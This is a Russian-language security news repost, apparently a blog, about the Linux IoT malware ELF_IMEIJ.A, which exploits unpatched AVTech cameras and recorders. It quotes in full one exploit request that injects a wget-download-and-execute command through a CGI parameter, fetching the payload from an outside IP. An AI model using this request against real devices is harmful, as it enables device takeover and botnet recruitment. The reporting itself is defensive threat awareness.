Мой основной блог ZLONOV.ru (RSS-лента) | Презентации и документы: SlideShare | Ссылка на Twitter: @zlonov

10 марта 2017 г.

Обнаружено новое вредоносное ПО для IoT-устройств

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет.

Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно.

Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО.

Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.


Источник: Новости - SecurityLab.ru